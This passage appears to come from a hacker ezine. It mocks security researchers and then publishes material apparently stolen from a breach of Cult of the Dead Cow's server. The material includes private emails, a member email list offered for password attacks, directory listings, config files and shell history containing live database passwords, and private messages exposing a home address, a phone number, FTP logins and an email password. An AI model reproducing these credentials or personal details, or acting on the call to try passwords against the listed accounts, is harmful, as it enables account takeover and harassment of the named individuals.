particular order, our nominees: - 1. Halvar Flake -- This guy is nuts. Literally. He's a giant with red -hair who has been known to spend months auditing binaries -(he's been known to work on a single binary audit longer than he has worked -for one company). A true inspiration to all the kids torrenting IDA at this -very second. We love you Halvar. - 2. Mark Dowd -- Another super intelligent chap, this man was formerly -an ADM member known as Duke. The Duke later left his blackhat roots behind him -and migrated to the nice sterile offices of ISS XForce. At work, he does insane -things like code Flash exploits that make Thomas Ptacek cum for days. -In his spare time he hunts down integer issues in the Ruby interpreter. -If anyone can find a way to make a computer suck a dick, this is the man -to do it. - 3. Felix somebody -- Better known as FX, this German national beat the -living shit out of Cisco IOS; not once but several times. Watch out all you .kr -and .mx admins, this guy's packing more IOS 11 0day than RSnake can make blog -posts in an afternoon. - -And the winner is Mark Dowd!! Watch out guys, he'll be the first to create -the legendary killer-sex-code-auditing robot. - -For the category of Biggest Let Down there was only one real choice: rgod. I'm -sure that everyone by now knows that this .it kid is dead. Not even a suicide -note or a mad hax spree? What to waste a perfectly good exit opportunity. At -least g4y h1tl3r went out in style. - -Blogs are very popular these days. Everybody and their intestinal parasites -seems to have one. Check out the nominations for Biggest Time Wasting Whitehat -Blog: - 1. GNUcitizen -- Everyone knows pdp. He loves to post info about CSRF -in SOHO routers and mass SNMP scans for the communities "public" and "private". -pdp is obviously a very skilled researcher and also happens to be able to write -halfway decent English (which is an improvement over 90% of the Internet). - 2. ha.ckers.org -- Yup, RSnake again. He's a busy man. But how can you -say the words "blog" in a sentence without also saying "RSnake"? - 3. Matasano -- The hangout of Thomas Ptacek et al. This is a highly -active community where you can engage in endless Internet debates about the -"correct" way to check the return value of malloc(). Just talking about it wants -to make me visit! - -And the winner is Matasano hands down!! Congrats guys! Really though, the other -nominations are boring as hell and I never fucking read them. Matasano, on -the other hand, can easily chew up some hours you could be using to -grep for strings like "strcpy" in C code (Luigi will be mad at me for giving -away his 0day techniques). - -Okay folks, that's all the time we have for tonight! Please join us next time -for another installment of the ZF0 pwnie awards! - -Oh, if you won, feel free to send an acceptance speech to -superheroes@hushmail.com. If it's halfway decent we may even publish it. - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 The Cult of the Dead Cow zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -Hey y'all... I didn't wanna raise a fuss yet on the general list, but there's -this asshole w/an ezine that's just issued a "Call for 0wning" against the -cDc (a sort of Gobbles/Phrack High Council thing, I guess). - -Here's the 'zine: -http://exp.vip8.org/papers/175 - -I was hoping you guys could poke at our stuff a bit and make sure our ducks -are in a row? - -Sorry this has happened - we try and avoid this kind of crap but I guess it's -bound to happen sometimes. - -thx, -k3v - - - -Hmm, philtered.net is in pretty good shape. we don't expose much externally. - I will rotate some passwords though. - -Did you tell Myles? - -Adam - - -Yeah, Myles called me this afternoon - I hadn't checked the Sekrut forum in a -couple days where there'd been a thread brewing about it. One of our NSF -kids in London got hacked by this guy first and he copied a bunch of his -personal email into the 'zine. Bad stuff. - -k3v - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - -List of cdc email addresses for you to use passes on: - -sd josh@anywheremobile.com -obscure n7cqNxW3jBMA@gmail.com -sirdystic josh@anywheremobile.com -freqout freqout@speakeasy.net -rfleming rfleming@rotten.com -dildog crioux@gmail.com -nstalker cht@gis.net -carrie carriec@blarg.net -oxblood laird@web.net -omega omega@rotten.com -bo2kdev bo2kdev@l0pht.com -bo2kbugs dildog@l0pht.com -bo dildog@l0pht.com -tfish tfish@world.std.com -myles myleslong@gmail.com -necrovore yesmar@speakeasy.net -xxxclusive renick@gmail.com -gratte deadcow@stone.he.net -deadcow deadcow@stone.he.net -feedback deadcow@stone.he.net -veggie lu3ke@yahoo.com -tarkin dgullet@circuitsmaximus.com -sunspot g@shazbot.com -willsie andy@zippy.porterville.k12.ca.us -ga matt@coolbeans.com -countzero danger.diabolik@gmail.com -wknight dan@quakka.com -white.knight dan@quakka.com -whiteknight dan@quakka.com -javaman javaman@ghetto.org -assrabbit aconner@eden.rutgers.edu -dark_s jonarmst@du.edu -webmaster myleslong@gmail.com -dayum ahalegarcia@yahoo.com -mixter mixter@gmail.com -digital digital@phantom.com -press press_cdc@yahoo.com -books myleslong@gmail.com -fgibe dreamwhip@gmail.com -gibe dreamwhip@gmail.com - - -$ ls -la /home/deadcow/ -total 3508 -drwx---r-x 12 deadcow users 4096 Apr 27 09:30 . -drwxr-xr-x 215 root root 8192 Apr 22 12:43 .. --rw-r--r-- 1 deadcow users 6278 Jul 14 2004 .addressbook --rw-r--r-- 1 deadcow users 3653 Jul 14 2004 .addressbook.lu --rw-r--r-- 1 deadcow users 5393 Feb 25 11:30 .bash_history --rw-r--r-- 1 deadcow users 34 Nov 23 1993 .less --rw-r--r-- 1 deadcow users 114 Nov 23 1993 .lessrc -lrwxrwxrwx 1 deadcow users 9 Aug 20 2007 .mysql_history -> /dev/null --rw------- 1 deadcow users 15982 Nov 7 2005 .pine-debug1 --rw------- 1 deadcow users 11475 Oct 9 2005 .pine-debug2 --rw------- 1 deadcow users 11559 Oct 8 2005 .pine-debug3 --rw------- 1 deadcow users 12536 Oct 5 2005 .pine-debug4 --rw-r--r-- 1 deadcow users 18190 Feb 25 11:22 .pinerc --rw------- 1 deadcow users 1024 Sep 11 2005 .rnd --rw-r--r-- 1 deadcow users 1199 Jan 24 22:57 .virtualmail --rw------- 1 deadcow users 821 Aug 15 2007 .virtualmail.save -drwx------ 3 deadcow users 17 Aug 18 2007 .webmail --rw-r--r-- 1 deadcow users 2798 Jul 28 2006 -20060720_scatterchat_emails_to_NSA.txt -drwx------ 2 deadcow users 6 Jan 6 2000 Mail -drwx---r-x 2 deadcow users 6 Jan 2 2000 annon-ftp-old --rw-r--r-- 1 deadcow users 162 Aug 8 2000 cDc.css -drwxr-xr-x 2 deadcow users 25 May 5 09:32 cgi-bin --rw------- 1 deadcow users 3248128 Jul 14 2004 core --rw------- 1 deadcow users 893 Feb 25 11:27 dead.letter --rw-r--r-- 1 deadcow users 1566 Jan 1 2002 hatemail.txt --rw-r--r-- 1 deadcow users 1695 Aug 8 2000 logo.gif -lrwxrwxrwx 1 deadcow users 13 Jun 21 2006 logs -> /logs/deadcow -drwx------ 2 deadcow users 43 Jan 26 07:19 mail --rw-r--r-- 1 deadcow users 15364 Mar 6 2000 old.cDc-0011.txt --rw-r--r-- 1 deadcow users 8600 Mar 6 2000 old.cDc-0012.txt --rw-r--r-- 1 deadcow users 13322 Mar 6 2000 old.cDc-0025.txt --rw-r--r-- 1 deadcow users 8178 Mar 6 2000 old.cDc-0032.txt --rw-r--r-- 1 deadcow users 19295 Mar 6 2000 old.cDc-0034.txt --rw-r--r-- 1 deadcow users 3540 Mar 6 2000 old.cDc-0037.txt --rw-r--r-- 1 deadcow users 200 Oct 12 2000 ps.out -drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 public_html -drwxr-xr-x 2 deadcow users 4096 Feb 22 15:36 public_torrents --rw-r--r-- 1 deadcow users 66293 Jan 5 2002 realpirate.cdc -drwxr-xr-x 2 deadcow users 114 Aug 8 2000 search -drwxr-xr-x 3 deadcow users 71 Jul 26 2000 secure_html --rw-r--r-- 1 deadcow users 43 Aug 8 2000 spacer.gif --rw-r--r-- 1 deadcow users 414 Jan 2 2002 spanish.txt -drwxr-xr-x 2 deadcow users 6 Apr 27 09:13 trash --rw-r--r-- 1 deadcow users 13972 Aug 8 2000 vaca.gif -$ ls -la /home/deadcow/public_html/ -total 924 -drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 . -drwx---r-x 12 deadcow users 4096 Apr 27 09:30 .. --rw-r--r-- 1 deadcow users 212 Jul 26 2007 .htaccess --rw-r--r-- 1 deadcow users 1226 Apr 28 2007 .htaccess.old -drwxr-xr-x 2 deadcow users 53 Jan 4 2000 .status --rw-r--r-- 1 deadcow users 100 Feb 8 2001 301.html --rw-r--r-- 1 deadcow users 100 Feb 8 2001 400.html --rw-r--r-- 1 deadcow users 100 Feb 8 2001 401.html --rw-r--r-- 1 deadcow users 100 Feb 8 2001 403.html --rw-r--r-- 1 deadcow users 100 Feb 8 2001 404.html --rw-r--r-- 1 deadcow users 100 Feb 8 2001 500.html --rw-r--r-- 1 deadcow users 100 Feb 8 2001 501.html --rw-r--r-- 1 deadcow users 257 Jun 6 2005 about_us.php3 --rw-r--r-- 1 deadcow users 467 Jun 19 2006 addfeed.php --rw-r--r-- 1 deadcow users 1094 Feb 7 2001 appearance_list.php3 -drwxr-xr-x 2 deadcow users 62 Aug 8 2007 appearances --rw-r--r-- 1 deadcow users 253 Aug 13 2005 apps.php3 -drwxrwxrwx 26 deadcow users 40960 Apr 22 08:35 archives --rw-r--r-- 1 deadcow users 3810 Feb 7 2001 audio_index.php3 --rw-r--r-- 1 deadcow users 5319 Mar 6 2000 back_orifice.txt -drwxr-xr-x 2 deadcow users 12288 Apr 24 09:29 banners -drwxr-xr-x 10 deadcow users 4096 Mar 25 07:41 bovinedawn --rw-r--r-- 1 deadcow users 2369 Jun 19 2006 bulletin.php --rw-r--r-- 1 deadcow users 705 Jun 19 2006 bulletinpost.php --rw-r--r-- 1 deadcow users 75964 Mar 6 2000 c6.txt --rw-r--r-- 1 deadcow users 162 Aug 8 2000 cDc.css -drwxrwxrwx 5 deadcow users 92 Apr 22 08:37 cDc_books -drwxrwxrwx 7 deadcow users 24576 Mar 26 03:16 cDc_files -drwxrwxrwx 3 deadcow users 4096 Feb 15 14:16 cDc_pix -drwxr-xr-x 3 deadcow users 4096 Jan 18 01:31 cDc_tunes -drwxrwxrwx 2 deadcow users 4096 May 8 09:33 cache --rw-r--r-- 1 deadcow users 861 Feb 7 2001 cdc_footer.php3 --rw-r--r-- 1 deadcow users 13261 Jul 22 2002 cdc_header.BAK2 --rw-r--r-- 1 deadcow users 13261 Feb 7 2001 cdc_header.php3 --rw-r--r-- 1 deadcow users 13849 Feb 7 2001 cdc_header.php3.BAK -drwxrwxrwx 4 deadcow users 4096 May 6 16:06 cdc_test --rw-r--r-- 1 deadcow users 0 Jan 17 2000 checker -drwxrwxrwx 8 deadcow users 8192 Apr 22 08:39 cms --rw-r--r-- 1 deadcow users 732 Mar 19 2001 common.php3 --rw-r--r-- 1 deadcow users 675 Feb 7 2001 common.php3.BAK --rw-r--r-- 1 deadcow users 1971 Feb 7 2001 contact.php3 --rw-r--r-- 1 deadcow users 604 Jul 24 2001 contact_action.php3 -drwxr-xr-x 7 deadcow users 4096 Aug 23 2007 cowfeed --rw-r--r-- 1 deadcow users 151 Jan 28 13:11 deeznutz.php --rw-r--r-- 1 deadcow users 253 Aug 13 2005 details.php3 --rw-r--r-- 1 deadcow users 9091 Aug 8 2000 dhtml.html -drwxr-xr-x 14 deadcow users 4096 Jan 29 10:30 dsF77E9qqXvY79t7Ic2d --rw-r--r-- 1 deadcow users 252 Jun 6 2005 faq.php3 --rw-r--r-- 1 deadcow users 256 Aug 13 2005 fashion.php3 --rw-r--r-- 1 deadcow users 846 Oct 29 2004 favicon.ico -drwxrwxrwx 2 deadcow users 45 Apr 22 08:36 feeds --rw-rw-rw- 1 deadcow users 86 Feb 15 12:15 feeds.txt --rw-r--r-- 1 deadcow users 262 Jun 6 2005 gallery_index.php3 --rw-r--r-- 1 deadcow users 623 Mar 6 2000 grafix.gif --rw-r--r-- 1 deadcow users 294 Aug 8 2000 graphic_only.php3 --rw-r--r-- 1 deadcow users 16580 Jul 17 2000 hacktivismo.gif --rw-r--r-- 1 deadcow users 260 Jul 9 2005 hacktivismo.html --rw-r--r-- 1 deadcow users 2303 Jan 5 2000 heads.gif --rw-r--r-- 1 deadcow users 3250 Mar 6 2000 hkbsplits.txt --rw-r--r-- 1 deadcow users 7375 Dec 29 2000 home --rw-r--r-- 1 deadcow users 236 Mar 6 2000 icon.gif -drwxr-xr-x 2 deadcow users 4096 Apr 3 13:10 images --rw-r--r-- 1 deadcow users 2082 Jul 31 2002 index-bak2 --rw-r--r-- 1 deadcow users 2904 Jan 17 2000 index.html.bak --rw-rw-rw- 1 deadcow users 2928 Feb 19 2006 index.html.old --rw-r--r-- 1 deadcow users 2451 Mar 14 13:44 index.php --rw-r--r-- 1 deadcow users 3026 Nov 15 2006 index.php.bak --rw-r--r-- 1 deadcow users 692 Aug 8 2000 index.php3.bak --rw-r--r-- 1 deadcow users 4146 Aug 16 2006 indexold.php -drwxr-xr-x 2 deadcow users 62 Jan 17 2000 k-cow --rw-r--r-- 1 deadcow users 1123 Aug 8 2000 kcow_phorce.php3 --rw-r--r-- 1 deadcow users 1410 Aug 8 2000 large_image.php3 --rw-r--r-- 1 deadcow users 69 Mar 6 2000 left.gif -drwxr-xr-x 2 deadcow users 23 Oct 13 2004 links --rw-r--r-- 1 deadcow users 447 Mar 6 2000 links.gif --rw-r--r-- 1 deadcow users 254 Jun 6 2005 links.php3 --rw-r--r-- 1 deadcow users 2562 Jul 25 2004 logo.gif --rw-r--r-- 1 deadcow users 1695 Aug 8 2000 logo_v5.gif --rw-r--r-- 1 deadcow users 687 Aug 8 2000 long_page_display.php3 --rw-r--r-- 1 deadcow users 253 Jul 18 2004 main.php3 --rw-r--r-- 1 deadcow users 590 Mar 6 2000 media.gif --rw-r--r-- 1 deadcow users 220332 Mar 12 2000 medialist6.html -drwxr-xr-x 2 deadcow users 23 Jul 9 2005 members -drwxr-xr-x 5 deadcow users 116 Jan 22 2006 merchandise --rw-r--r-- 1 deadcow users 260 Jun 6 2005 merchandise.php3 -drwxr-xr-x 2 deadcow users 23 Oct 17 2004 music -drwxr-xr-x 5 deadcow users 4096 Jan 28 2007 news --rw-r--r-- 1 deadcow users 4207 Feb 7 2001 news_archive.php3 -drwxr-xr-x 2 deadcow users 51 Oct 13 2004 newspapers --rw-r--r-- 1 deadcow users 267 Jun 6 2005 ninja_strike_force.php3 -drwxr-xr-x 3 deadcow users 36 Jul 9 2005 nsf -drwxr-xr-x 4 deadcow users 4096 May 1 2007 oldskool -drwxr-xr-x 2 deadcow users 4096 Jan 28 2007 panel2001 --rw-r--r-- 1 deadcow users 1122 Aug 8 2000 photo_logo.php3 -drwxr-xr-x 2 deadcow users 43 Dec 10 2006 php -drwxrwxrwx 20 deadcow users 4096 Apr 22 08:37 pics --rw-r--r-- 1 deadcow users 655 Aug 8 2000 populate.php3 --rw-r--r-- 1 deadcow users 260 Jul 10 2005 pr19990719.html --rw-r--r-- 1 deadcow users 1065 Feb 7 2001 press.php3 --rw-r--r-- 1 deadcow users 3937 Aug 8 2000 press_releases.php3 -drwxr-xr-x 2 deadcow users 43 Jul 9 2005 prox --rw-r--r-- 1 deadcow users 44 Oct 12 2000 pvers.php3 --rw-r--r-- 1 deadcow users 432 Sep 2 2006 random_splash.php --rw-r--r-- 1 deadcow users 11434 Mar 6 2000 rebuttal.txt --rw-r--r-- 1 deadcow users 4803 Mar 6 2000 response.txt --rw-r--r-- 1 deadcow users 0 Jul 9 2005 robots.txt -drwxr-xr-x 3 deadcow users 110 Jul 9 2005 search -drwxr-xr-x 2 deadcow users 60 Aug 24 2007 sekrut --rw-r--r-- 1 deadcow users 43 Aug 8 2000 spacer.gif -drwxr-xr-x 2 deadcow users 4096 Nov 17 12:18 splash -drwxrwxrwx 3 deadcow users 4096 Nov 26 14:56 strategy --rw-r--r-- 1 deadcow users 1076 Jul 20 2006 style.css --rw-r--r-- 1 deadcow users 258 Jun 6 2005 team_bios.php3 -drwxr-xr-x 2 deadcow users 4096 Jul 12 2005 templates -drwxr-xr-x 2 deadcow users 96 Jul 20 2006 test --rw-r--r-- 1 deadcow users 422 Apr 4 2001 text_only.php3 --rw-r--r-- 1 deadcow users 263 Jun 6 2005 textfile_index.php3 -drwxr-xr-x 14 deadcow users 4096 Feb 18 15:32 tools -drwxr-xr-x 2 deadcow users 4096 Feb 11 2001 trash --rw-r--r-- 1 deadcow users 13972 Aug 8 2000 vaca.gif --rw-r--r-- 1 deadcow users 1051 Aug 8 2000 who_helping.php3 -$ ls -la /home/deadcow/public_html/sekrut -total 72 -drwxr-xr-x 2 deadcow users 60 Aug 24 2007 . -drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 .. --rw-r--r-- 1 deadcow users 1033 Aug 24 2007 index.php --rw-r--r-- 1 deadcow users 25671 Aug 24 2007 secrets1.jpg --rw-r--r-- 1 deadcow users 31090 Aug 24 2007 secrets2.jpg -$ ls -la /home/deadcow/public_html/strategy/ -total 116 -drwxrwxrwx 3 deadcow users 4096 Nov 26 14:56 . -drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 .. --rw-rw-rw- 1 nobody nobody 1036 Jun 18 2006 about.php --rw-rw-rw- 1 nobody nobody 948 Jun 17 2006 affiliates.php -drwxrwxrwx 2 nobody nobody 4096 Jun 17 2006 archives --rw-rw-rw- 1 nobody nobody 1195 Jun 17 2006 archives.html --rw-rw-rw- 1 nobody nobody 11646 Jun 17 2006 atom.xml --rw-rw-rw- 1 nobody nobody 864 Jun 17 2006 contact.php --rw-rw-rw- 1 nobody nobody 6411 Jun 18 2006 entry.php --rw-rw-rw- 1 nobody nobody 6621 Jul 26 2006 index.php --rw-rw-rw- 1 nobody nobody 2942 Jun 17 2006 index.rdf --rw-rw-rw- 1 nobody nobody 2494 Jun 17 2006 index.xml --rw-rw-rw- 1 nobody nobody 485 Jul 26 2006 main.php --rw-rw-rw- 1 nobody nobody 44 Jun 17 2006 media.php --rw-rw-rw- 1 nobody nobody 54 Jun 17 2006 news.php --rw-rw-rw- 1 nobody nobody 8615 Jul 27 2006 publications.php --rw-rw-rw- 1 nobody nobody 541 Jun 14 2006 rsd.xml --rw-rw-rw- 1 nobody nobody 1735 Jun 18 2006 search.php --rw-rw-rw- 1 nobody nobody 4889 Jun 22 2006 staff.php --rw-rw-rw- 1 nobody nobody 3249 Jun 16 2006 staff.txt --rw-rw-rw- 1 nobody nobody 262 Nov 26 14:56 styles-site.css -$ ls -la /home/deadcow/public_html/k-cow/ -total 24 -drwxr-xr-x 2 deadcow users 62 Jan 17 2000 . -drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 .. --rw-r--r-- 1 deadcow users 476 Jan 17 2000 WS_FTP.LOG --rw-r--r-- 1 deadcow users 4669 Jan 17 2000 index.html --rw-r--r-- 1 deadcow users 3748 Jan 17 2000 index_plain.htm -$ cat /home/deadcow/public_html/bovinedawn/config.php -<?php - - -// phpBB 2.x auto-generated config file -// Do not change anything in this file! - -//$dbms = 'mysql4'; -$dbms = 'mysql'; - -$dbhost = 'stone'; -$dbname = 'deadcow'; -$dbuser = 'deadcow'; -$dbpasswd = 'KSGmrFp0Qec2dQsbDWi1'; - -$table_prefix = 'phpbb_dojo_'; - -define('PHPBB_INSTALLED', true); - -?> -$ cat /home/deadcow/public_html/dsF77E9qqXvY79t7Ic2d/mt-config.cgi -## Movable Type configuration file ## -## ## -## This file defines system-wide settings for Movable Type ## -## In total, there are over a hundred options, but only those ## -## critical for everyone are listed below. ## -## ## -## Information on all others can be found at: ## -## http://www.sixapart.com/movabletype/docs/config - -################################################################ -##################### REQUIRED SETTINGS ######################## -################################################################ - -# The CGIPath is the URL to your Movable Type directory -CGIPath http://www.cultdeadcow.com/dsF77E9qqXvY79t7Ic2d/ - -# The StaticWebPath is the URL to your mt-static directory -# Note: Check the installation documentation to find out -# whether this is required for your environment. If it is not, -# simply remove it or comment out the line by prepending a "#". -StaticWebPath http://www.cultdeadcow.com/dsF77E9qqXvY79t7Ic2d/mt-static - -#================ DATABASE SETTINGS ================== -# REMOVE all sections below that refer to databases -# other than the one you will be using. - -##### MYSQL ##### -ObjectDriver DBI::mysql -Database deadcow -DBUser deadcow -DBPassword KSGmrFp0Qec2dQsbDWi1 -DBHost stone - -# Comment Script # -CommentScript hnRYBnJSmLM7RAZ9IfdHC.cgi - -# Admin Script # -AdminScript xZ3e3PbDYWYzxcLF89aX.cgi -$ cat /home/deadcow/.bash_history -dir -cd temp-to-be-deleted -dir -tar -xvzf cdc_site_07_14_2006.tgz -'public_html/mt/search_templates/default.tmpl' -dir -tar -xvzf cdc_site_07_14_2006.tgz -exit -pine -exit -pine -exit -pine -exit -pine -ls -exit -pine -exit -pine -ls -cd public_html -ls -cd cDc_tunes -ls -rm CDC262.MP3 -ls -mv CDC263.MP3 CDC262.MP3 -ls -rm CDC262.MP3 -ls -exit -pine -exit -ls -cd public_html -ls -cd cDc_tunes -ls -ls -la -ls -la -ls -la -exit -cd public_html/sekrut -dir -exit -dir -cd public_html -makedir bovinedawn -cd dojo -dir -chmod 666 config.php -mysql -mysql zkq7fswz -exit -ls -cd public_html -cd cDc_tnes -ls -cd cDc_tunes -ls -ls -la -ls -la -exit -pine -pico .addressbook -pico .forward -ls -la -pico .virtualmail -exi -exit -ls -who -ls -ls -la -ls cdc* -rm cdc_site_07 -rm cdc_site_* -ls -ls *dox -rm N65\ dox.zip -rm N64\ dox.zip -rm NES\ dox.zip -rm SNES\ dox.zip -rm beanstalk.txt -rm Atari\ 2600\ dox.zip -ls -rm Genesis*.zip -rm devolish.jpg -ls mt* -ls mt* -la -rm neat\ links.zip -ls public* -la -ls public* -la -ls -ls public_html* -la -ls -ls *.tar* -rm public_html.tar.gz -ls -tar -cvf cdc_backup_10_31_06.tar * -ls -gzip cdc_backup_10_31_06.tar -ls -pine -exi -exit -pine -pine -exit -python -v -dir -% python -V -python -V -exit -dir -tar -cvzf cdc_backup_08_15_07.tar.gz public_html -dir -backup database -mysqel -mysql -mysql zkq7fswz -mysql -u deadcow -p -mysql dump -u deadcow -p zkq7fswz -mysql dump -u deadcow -p zkq7fswz > deadcowbackup081507.sql -dir -exit -mysqldump -u deadcow -p zkq7fswz deadcow > deadcowbackup081507.sql -mysqldump -u deadcow -p deadcow > deadcowbackup081507.sql -exit -pine -pine -ls -cd logs -ls -ls -la -more access_log -ls -ls -la -cd .. -ls -passwd -who -exit -ls -who -exit -ls -more *scatterchat*.txt -ls -rm cdc_backup_08_15_07.tar.gz -ls -more cheyenne.txt -ls -more core -more dead.letter -ls -rm dead.letter -ls -ls -la -tar -cvf cdc_backup_08_18_2007.tar * -ls -gzip cdc_backup_08_18_2007.tar -ls -ls -la -ls -la -ls -ls -la -who -exit -ls -ls -pine -ls -exit -ls -who -who -whois root -finger root -exit -mysql -u deadcow -mysql -u deadcow -p -who -mysql -u deadcow -p -finger deadcow -mysql -u deadcow -p -mysql -u deadcow -p -mysql -u deadcow -p -mysql -u deadcow -p -mysql -u deadcow -p -mysql -u deadcow -p -mysql -u deadcow -p -mysql -u deadcow -p -mysql -u deadcow@stone -p -mysql -u deadcow -p -mysql -h -mysql -h stone -mysql -u deadcow -h stone -p -exit -who -ls -rm cheyenne.txt -ls -la -who -ls -cd cgi-bin -ls -ls -la -who -cd .. -who -ls -cd .. -ls -cd hayride -cd slim50 -ls -cd deadcow -ls -who -who -who -ls -ls -la -rm deadcowbackup.sql -ls -wo -who -netstat -ls -ls -la -cd cgi-bin -ls -cd .. -ls -cd trash -ls -cd .. -ls -cd public_html -ls -cd php -ls -cd .. -ls -more pvers.php3 -who -cd php -ls -cd .. -ls -cd .. -ls -cd secure_html -ls -ls -ls -cd cdc_admin -ls -ls -la -cd .. -cd .. -ls -who -cd public_html -ls -cd sekrut -ls -cd db -ls -cd .. -cd .. -ls -cd ./ -ls -cd /. -where -ls -cd home -ls -cd deadcow -ls -more hatemail.txt -ls -more evilsub.txt -ls -more gates.txt -ls -rm gates.txt -mysqldump -zkq7fswz deadcow > deadcow_backup_08_19_2007.sql -mysqldump zkq7fswz deadcow > deadcow_backup_08_19_2007.sql -mysqldump -zkq7fswz deadcow > deadcow_backup_08_19_2007.sql -mysqldump zkq7fswz deadcow > deadcow_backup_08_19_2007.sql -mysqldump zkq7fswz > deadcow_backup_08_19_2007.sql -mysqldump zkq7fswz deadcow > deadcow_backup_08_19_2007.sql -mysqldump -pzkq7fswz deadcow > deadcow_backup_08_19_2007.sql -ls -ls -la -rm deadcowbackup081507.sql -rm cdc_backup_08_18_2007.tar.gz -ls -mysqldump -pzkq7fswz deadcow > deadcow_backup_08_19_2007.sqlwho -s -ls -rm deadcow_backup_08_19_2007.sqlwho -ls -tar -cvf cdc_deadcow_backup_08_19_2007.tar * -ls -gzip cdc_deadcow_backup_08_19_2007.tar -ls -ls -la -rm deadcow_backup_08_19_2007.sql -ls -who -who -who -finger deadcow -who -who -who -exit -ln -s /dev/null $HOME/.mysql_history -exit -ls -who -more #pico* -ls -more #pico04424# -more #pico04424# -less #pico04424# -ls -la -more #pico04424# -help more -pico #pico04424# -ls -rm #picco04424# -pico -rm #pico04424# -rm #pico04424#* -rm --help -ls -la -pico -ls -la -pico -ls -la -ls -la -rm -f #pico04424# -ls -la -ls -rm ./#pico04424# -ls -rm ./#pico24046# -ls -ls -la -more .pine-debug1 - ls -ls -la -mail -pine -ls -pine -ls -rm dumb*.txt -ls -more evilsub.txt -ls -rm evilsub.txt -more hatemail.txt -ls -rm cdc401draft.txt -more camerashy.txt -rm camerashy.txt -ls -rm cdc_deadcow_backup_08_19_2007.tar.gz -ls -who -who -who -who -who -ls -pine -who -exit -who -whois bookits2 -who bookits2 -who -finger bookits2 -ls -cd logs@ -cd .logs -cd logs -ls -cd .. -gzip logs logs.zip -gzip logs@ -cd logs@ -tar logs@ -tar --usage -ls -cd logs -tar -cvf logs_8_22_07.tar -tar -cvf logs_8_22_07.tar * -ls -tar -cvf logs.tar * -ls -who -cd .. -ls -ls -who -exit -woh -who -pine -ls -who -exit -who -mysqldump -pKSGmrFp0Qec2dQsbDWi1 deadcow > deadcow_backup_08_23_2007.sql -mysqldump -pKSGmrFp0Qec2dQsbDWi1 deadcow > deadcow_backup_08_23_2007.sql -mysqldump -pKSGmrFp0Qec2dQsbDWi1 deadcow@localhost > -deadcow_backup_08_23_2007.sql -mysqldump -pKSGmrFp0Qec2dQsbDWi1 deadcow > deadcow_backup_08_23_2007.sql -who -exit -mysql -u deadcow -h stone -p -exit -mysql -u deadcow -h stone -p -exit -who -who -exit -ls -more ps.out -ethereal -netstat -strace -strace -u deadcow -nmap -who -exit -cat /etc/passwd -cat /etc/shadow -dir -cd annon-ftp-old -dir -ls -cd .. -dir -cd search -dir -pico noisewords.txt -exit -who -ls -la -more .virtualmail -pico .virtualmail -exit -ls -ls -la -more .addressbook -more .addressbook -ls -ls l-la -ls -la -ls -more .virtualmail -pine -pine -ls -pine -ls -ls -la -pico .virtualmail -pine -ls -pine -pine -ls -pico .virtualmail -pine -pico .virtualmail -pine -pine -pico .virtualmail -pine -pine -pico .virtualmail -pine -ls -more .virtualmail -exit -who -pine -exit -pine -exit -ls -pine -exit - -~~~~~~~~~~~~~~~~~~~~~~~~~ - -Some lame PM's for you: - -(3764,'d374960c1e','sweet, sounds good!\r\n\r\nmy addy is: 45465 25th St. East -#144 Lancaster, CA 93535\r\n\r\nThank you NS, appreciate it.\r\n-Siph'), - -(4142,'00243d938a','[quote:00243d938a=\"GreenDiamond\"]Been noticing the amount -of registered users climbing up, about three-hundred within the past few days. -They\'re probably really bumming some SEO off of -cultdeadcow.[/quote:00243d938a]\r\n\r\nIndeed. I need to go through and delete -these fuckers. I do that about once per week, fun!'), - -(2189,'b3bf87a14b','Actually, in all seriousness, I did have to fuck a cow. A -dead cow. It made me kind of nervous and sort of smelled bad, but it was pretty -hot, and I don\'t think that the cow minded much. It\'s really hard once -rigermortis sets in, because it is just not as flexible.'), - -(2670,'7632aa9253','Hey man just use my password for the moment, I\'m too lazy -to figure out why ur ftp account doesn\'t work:\r\n\r\nusername: -hardwire\r\npassword: Emp1repr0duX\r\n\r\ndon\'t uh, delete anything or i\'ll -have to like... re-upload it. :)\r\n\r\nIf you need to make a SQL database the -control panel is at: http://www.nethertech.org/cpanel\r\n\r\nuse the same -name/pwd'), - -(347,'f139ce7d58','Dildog,\r\n\r\nHeads up. Kevin directed me to you. I am -working on the next version of Torpark and the release of the new Torhawk. I -want to give back to cDc/Hackmo/NSF because I am about to monetize the -situation. This has become a trademarking issue. I want the cDc stamp of -approval, so I need someone to review it. Either to review the source code, -anon network, or both. And that means I need a dildog up in my ports. Ratte -suggested you were the man for the job. And if you weren\'t man enough, you -could suggest someone who was. And of course, this would mean some sort of fee -or percentage of net profits.\r\n\r\nLet\'s rap.\r\n\r\nemail to -arrakistor@gmail.com, or call me at +1.469.831.6648, but tell me the phone -number you will cal from or hack the caller ID to say "1337" and I -will directly pickup.\r\n\r\nSteve'), - -(5146,'7b39b848db','thanks, snookums. your awesomeness is matched only by your -virility. In return, I give you the password to transend\'s -email:\r\n\r\ntransend@dcemail.com\r\nsinjin\r\n\r\nluv <3'), - 